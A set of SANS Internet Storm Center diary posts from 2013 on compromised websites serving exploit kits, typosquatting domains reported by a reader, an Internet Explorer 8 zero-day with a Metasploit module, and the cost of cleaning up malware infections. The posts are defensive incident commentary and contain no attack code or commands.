This morning, a reader wrote in to notify us that the website of a county government in Georgia was compromised. Sure enough, it appeared to serve malicious JavaScript, launching the usual exploit kit Java exploit (ZeroAccess was the reader's guess, and I think he was right). With smaller sites/organizations like this, I usually try to give them a call, and in this case I was pretty quickly put through to the person responsible for the web site content. Sadly, I don't think this person had enough basic understanding of exploit kits or web applications to follow most of what I tried to explain, but she knew someone to contact. As of right now, the web site *appears* to be "clean". Which gets me to the next point: some of the difficulties one encounters in notifying sites:

- Frequently, as in this case, the exploit only shows up on some pages, and not all the time. Sometimes you need to visit with a specific browser, sometimes it is random, and in other cases the miscreant appears to filter out requests from "administrators", showing them the unaltered site.

- It is very hard to get people NOT to go to the URL right away as you talk about it being dangerous. It was relatively early in the morning and I forgot my usual introduction not to go to the site, so sure enough, as I explained which page I noticed as "infected", the person on the phone responded "but it looks normal"...

- In particular for small sites like this, the standard blocklists don't work. VirusTotal's URL scanner showed the site as "safe". Kaspersky Anti-Virus on one of my Macs flagged the JavaScript with a generic exploit signature and prevented access.

FWIW: My guess is that the site was infected via the WordPress plugin "Super Cache", which was installed on the site. This plugin had some recent vulnerabilities.

The other compromise, which created a larger news response, was the compromise of wtop. com and federalnewsradio. com. Both sites are related to each other, so I consider them one compromise. The interesting response in this case was that the site blocked access from users running Internet Explorer, but let others in. I didn't see any exploit code when I retrieved the site, but I am not sure it is safe to assume that an exploit is only going to target one particular browser, given that, as noted above, a miscreant may filter requests and show some visitors the unaltered site.

Johannes B. Ullrich, Ph.D.
SANS Technology Institute


Published: 2013-05-07

Is there an epidemic of typo squatting?

One of our readers, Jim, wrote in earlier today to say he has noticed an increase in "working" typo squatting over the last 2 months or so.  That is, he's seen users accidentally surfing to such domains or being redirected there by some sort of malicious JavaScript trickery.  His question for us (and the rest of you) is: is this a local phenomenon, or are the bad guys making more use of this tactic?  I'm not currently set up to monitor this type of activity, so I figured I'd ask our loyal readers.  Do you monitor your proxy and DNS logs for this type of activity, and have you seen an increase?  Leave a comment below or use our contact form to let us know.  Below are just a few examples of the domains he has seen.

Bogus domains include:

  • audilble.com
  • boatrader.com
  • charleesschwab.com
  • chsse.com
  • cnnmonet.com
  • dilymail.co.uk
  • loanadminstration.com
  • myunh.com
  • nydailnews.com
  • nydailynew.com
  • nyeater.com
  • nylottory.org


Jim Clausing, GIAC GSE #26
jclausing --at-- isc [dot] sans (dot) edu


Published: 2013-05-06

Internet Explorer 8 0-Day Update (CVE-2013-1347)

Thanks to our reader Juha-Matti for pointing out that a Metasploit module was released to exploit the recent Internet Explorer 8 vulnerability. The vulnerability has also been assigned CVE-2013-1347.

Please let us know if you are running into exploits for this vulnerability.

Johannes B. Ullrich, Ph.D.
SANS Technology Institute


Published: 2013-05-04

The Zero-Day Pendulum Swings

Thanks to readers Ken and Paul, we've been supplied with some zero-day reading.   The best I can skim at short notice from these stories, which developed yesterday, is that Microsoft is looking into claims of an IE 8 vulnerability. [1]    IE 6, 7, 9 and 10 are claimed to be unaffected.

I suggest the pendulum analogy because one article reports that a US Government website was hacked [2] by way of a 'watering hole' attack [3] using what is now believed to be a zero-day; the attack was originally reported as dropping a slightly modified version of the well-known trojan 'Poison Ivy'. [4]

Too many links, too little time.  There is a lot of good reading out there right now, leaving much to review as this issue develops.   So please share your comments and knowledge on this issue with us and our community as it develops.

[1] http://technet.microsoft.com/en-us/security/advisory/2847140
[2] http://labs.alienvault.com/labs/index.php/2013/u-s-department-of-labor-website-hacked-and-redirecting-to-malicious-code/
[3] http://arstechnica.com/security/2013/05/internet-explorer-zero-day-exploit-targets-nuclear-weapons-researchers/
[4] http://www.invincea.com/2013/05/part-2-us-dept-labor-watering-hole-pushing-poison-ivy-via-ie8-zero-day/

ISC Handler on Duty



Published: 2013-05-01

The cost of cleaning up

As Johannes mentioned in yesterday's ISC StormCast, the city of Schwerin in Germany apparently decided to throw 170 PCs into the trash, because cleaning them of a Conficker worm infestation was estimated at around 130'000 Euros, whereas the replacement of the old PCs had already been budgeted at 150'000 Euros. Our recent discussion on whether a modern malware infection can actually be "cleaned", or whether wiping and reinstalling from scratch is always called for, aside, "the cost of cleaning up" is relevant in either case. Schwerin's 130k Euro estimate amounts to about 765 Euros, roughly $1000, per PC. The report doesn't say whether this calculation includes the lost productivity of the employee who has to wait for his/her computer to be returned from scrubbing, or whether it covers just the cleaning/reinstall itself.

Some Google searches gave me a going rate between 79$ and 299$ for a malware clean-up on a single home user PC, and several of the providers mention explicitly that they offer a "fresh install" for a lower price than the cleanup, which is one more indication that "re-install" seems to become the norm.

My search didn't result in any decent figures for virus cleanup costs in a mid-to-large corporate environment though. Companies of a certain size are likely set up to automatically provision and install new computers, so a replacement/re-stage should be a standard process for them, and relatively quick and cost effective. If you have any figures on the actual cost of cleanup/restage in a larger organization, or know any recent studies that have analyzed this in some depth, please let us know.